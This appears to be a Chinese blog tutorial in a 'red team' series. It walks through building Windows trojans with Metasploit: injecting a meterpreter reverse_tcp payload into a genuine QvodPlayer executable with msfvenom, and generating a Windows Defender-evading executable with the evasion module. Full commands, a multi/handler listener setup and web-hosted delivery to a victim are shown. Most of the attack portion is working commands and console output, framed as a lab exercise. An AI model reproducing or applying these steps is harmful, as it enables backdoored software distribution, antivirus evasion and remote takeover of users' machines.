首页 > 系统相关 >红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]

红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]

时间:2024-12-04 22:02:57浏览次数:5  
标签:Metasploit exe evasion windows payload QvodTerminal 红队 msf6 木马病毒

上节回顾

目录

上节回顾

1.模拟黑客给真正的快播软件加上后门

先下载一个正常的快播软件

可以下载绿色版本,免安装的快播软件

上传到 QvodTerminal.exe 到 kali 上

对 QvodTerminal.exe 注入 payload 后门程序

使用绑定了后门的 QvodTerminal.exe 替换原来的 QvodTerminal.exe

 将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe

在 kali 上开始监听后门

打开快播主程序准备看苍老师电影

之后回显的窗口点击运行即可

在 Kali 上查看会话已经建立了,说明后门运行成功了 

2.使用 metasploit 的 evasion 模块生成后门木马

补充:

evasion 是 metasploit 自带的模块,使用此模块可以生成反杀毒软件的木马

使用 evasion/windows/windows_defender_exe 这个模块

 配置文件名参数

设置 payload

设置本地监听 IP 和端口

生成木马文件[即执行]

 汇总

开启监听后门木马

打开另一个终端,将生成的木马文件复制到 /var/www/html

接着在 win7 浏览器中 打开 http://192.168.1.53/xuegod.exe下载后并且运行即可

在 MSF 终端可以查看到已经建立 session

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]


1.模拟黑客给真正的快播软件加上后门

先下载一个正常的快播软件

可以下载绿色版本,免安装的快播软件

  • 解开这个包后,找到 QvodTerminal.exe
  • 先查看主程序会调用哪些附加的小程序,然后把 payload 后门和这些小程序绑定到一起。当然也可
    以直接加到主程序上,但是加主程序上,有时报错。
  • 当 QvodPlayer.exe 主程序运行时,会自动调用 QvodTerminal.exe 这个小程序。

 

上传到 QvodTerminal.exe 到 kali 上

对 QvodTerminal.exe 注入 payload 后门程序

root@xuegod53:~# msfvenom -a x86 --platform windows -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe

使用绑定了后门的 QvodTerminal.exe 替换原来的 QvodTerminal.exe

  • 在 win7 虚拟机上下载绑定了后门的 QvodTerminal.exe
  • 在浏览器上访问:http://192.168.1.53/QvodTerminal.exe 并且下载 QvodTerminal.exe

 将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe

在 kali 上开始监听后门

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

打开快播主程序准备看苍老师电影

之后回显的窗口点击运行即可

在 Kali 上查看会话已经建立了,说明后门运行成功了 

2.使用 metasploit 的 evasion 模块生成后门木马

补充:

  • evasion 是 metasploit 自带的模块,使用此模块可以生成反杀毒软件的木马

msf6 exploit(multi/handler) > search evasion

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   evasion/windows/applocker_evasion_install_util                        normal  No     Applocker Evasion - .NET Framework Installation Utility
   1   evasion/windows/applocker_evasion_msbuild                             normal  No     Applocker Evasion - MSBuild
   2   evasion/windows/applocker_evasion_regasm_regsvcs                      normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   3   evasion/windows/applocker_evasion_workflow_compiler                   normal  No     Applocker Evasion - Microsoft Workflow Compiler
   4   evasion/windows/applocker_evasion_presentationhost                    normal  No     Applocker Evasion - Windows Presentation Foundation Host
   5   evasion/windows/syscall_inject                                        normal  No     Direct windows syscall evasion technique
   6   exploit/unix/webapp/php_eval                         2008-10-13       manual  Yes    Generic PHP Code Evaluation
   7   evasion/windows/windows_defender_exe                                  normal  No     Microsoft Windows Defender Evasive Executable
   8   evasion/windows/windows_defender_js_hta                               normal  No     Microsoft Windows Defender Evasive JS.Net and HTA
   9   evasion/windows/process_herpaderping                                  normal  No     Process Herpaderping evasion technique
   10  post/windows/gather/checkvm                                           normal  No     Windows Gather Virtual Environment Detection


Interact with a module by name or index. For example info 10, use 10 or use post/windows/gather/checkvm                                                                                         

msf6 exploit(multi/handler) > 

使用 evasion/windows/windows_defender_exe 这个模块

msf6 exploit(multi/handler) > back
msf6 >  use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  FpIYCf.exe       yes       Filename for the evasive file (default: random)


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows



View the full module info with the info, or info -d command.

msf6 evasion(windows/windows_defender_exe) > 

 配置文件名参数

set FILENAME xuegod.exe

设置 payload

 set payload

设置本地监听 IP 和端口

 set LHOST 192.168.1.53

生成木马文件[即执行]

set LPORT 4444

 汇总

msf6 evasion(windows/windows_defender_exe) > set FILENAME xuegod.exe
FILENAME => xuegod.exe
msf6 evasion(windows/windows_defender_exe) > set payload
payload => 
msf6 evasion(windows/windows_defender_exe) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) >  set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 evasion(windows/windows_defender_exe) >  set LPORT 4444
LPORT => 4444
msf6 evasion(windows/windows_defender_exe) > run

开启监听后门木马

msf6 >  use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

打开另一个终端,将生成的木马文件复制到 /var/www/html

 cp /root/.msf4/local/xuegod.exe /var/www/html/xuegod.exe

接着在 win7 浏览器中 打开 http://192.168.1.53/xuegod.exe下载后并且运行即可

在 MSF 终端可以查看到已经建立 session

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 


专栏跑道二


➡️ 24 Network Security -LJS 

​ 

专栏跑道三


 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五


➡️RHCE-LJS[Linux高端骚操作实战篇]

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

标签:Metasploit,exe,evasion,windows,payload,QvodTerminal,红队,msf6,木马病毒
From: https://blog.csdn.net/weixin_74796680/article/details/144200508

相关文章

  • 一文带你了解HVV实战攻防演练之红队攻击,零基础入门到精通,收藏这一篇就够了!
    0x00什么是红队红队,一般是指网络实战攻防演习中的攻击一方。红队一般会针对目标系统、人员、软件、硬件和设备同时执行的多角度、混合、对抗性的模拟攻击;通过实现系统提权、控制业务、获取数据等目标,来发现系统、技术、人员和基础架构中存在的网络安全隐患或薄弱环节。红......
  • #靶机#--红队靶机vulnstack-2
    环境搭建打开web虚拟机用其他用户凭证登陆,密码过期修改密码就登陆成功了管理员账号密码:administrator/2wsx#EDCde1ay/1qaz@WSX管理员身份打开C:\Oracle\Middleware\user_projects\domains\base_domain\bin\starWebLogicnmap扫描主机发现nmap-sn-ohosts192.16......
  • 【红队】windows立足点建立技术
    本文涵盖了将PowerShell-Empire设置为C2服务器的过程,以及如何生成可用于在目标系统上获得初步立足点的宏Excel文档。ATT&CK初始访问包括使用各种进入向量在网络中获得其初始立足点的技术。用于获得立足点的技术包括有针对性的鱼叉式网络钓鱼和利用面向公众的Web服务器上的弱点......
  • Metasploit Pro 4.22.5-2024111401 发布下载,新增功能概览
    MetasploitPro4.22.5-2024111401发布下载,新增功能概览MetasploitPro4.22.5-2024111401(Linux,Windows)-专业渗透测试框架Rapid7Penetrationtesting,releasedNov14,2024请访问原文链接:https://sysin.org/blog/metasploit-pro-4/查看最新版。原创作品,转载......
  • Tryhackme轮椅式学习 之红队路线 之Windows权限提升
    Task 1Introduction介绍Duringapenetrationtest,youwilloftenhaveaccesstosomeWindowshostswithanunprivilegeduser.Unprivilegeduserswillholdlimitedaccess,includingtheirfilesandfoldersonly,andhavenomeanstoperformadministr......
  • 浅谈红队攻防之道-Cobalt Strike实战
    我不想一辈子被人踩在脚下,你以为我是臭要饭的,我努力了三年,就是要等一个机会,我要争一口气,不是想证明我了不起;我是要告诉人家,我失去的东西一定要拿回来!成果cs获取shellmsf已经拿到了meterpreter现在把这个meterpreter的shell派生到CS上面,也就是让CS也也拿到一个shellms......
  • 2024护网行动:HW常见红队使用工具_红队工具
    目录什么是HW?什么是网络安全红蓝对抗?红队常见工具信息收集工具Nmap简介漏洞扫描工具Nessus简介AWVS简介抓包工具Wireshark简介TangGo简介web应用安全工具Burpsuite简介SQLMapwebshell管理工具蚁剑冰蝎后渗透工具CobaltStrikeMeterpreter密码破......
  • 2024红队必备工具列表总结_railgun工具
    一、信息收集1、AppInfoScanner一款适用于以HVV行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、......
  • 红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)
    大家好,我是Dest1ny。今天我们是红队专题中的远控安卓。这个实验会非常有趣,大家多多点赞!环境:一台有公网ip的vps/kali/带msf工具即可一台安卓手机(最好老一点,因为我们这里不涉及免杀)CLASS-1msfconsole和msfvenommsfconsole功能:msfconsole是Metasploit框架......
  • 红队攻防 | 凭证获取的10个方法,零基础入门到精通,收藏这一篇就够了
    作为红队成员,就像许多其他APT一样,我们须找到通往目标网络和资产的方法,因此要付出大量努力,从我们可以获得的任何资源中获取登录凭证或令牌。这并不意味着我们只寻找登录特定服务的用户名和密码,在许多情况下,我们还需要寻找令牌,API密钥,甚至有效Cookie。特别是在采用最佳安全实......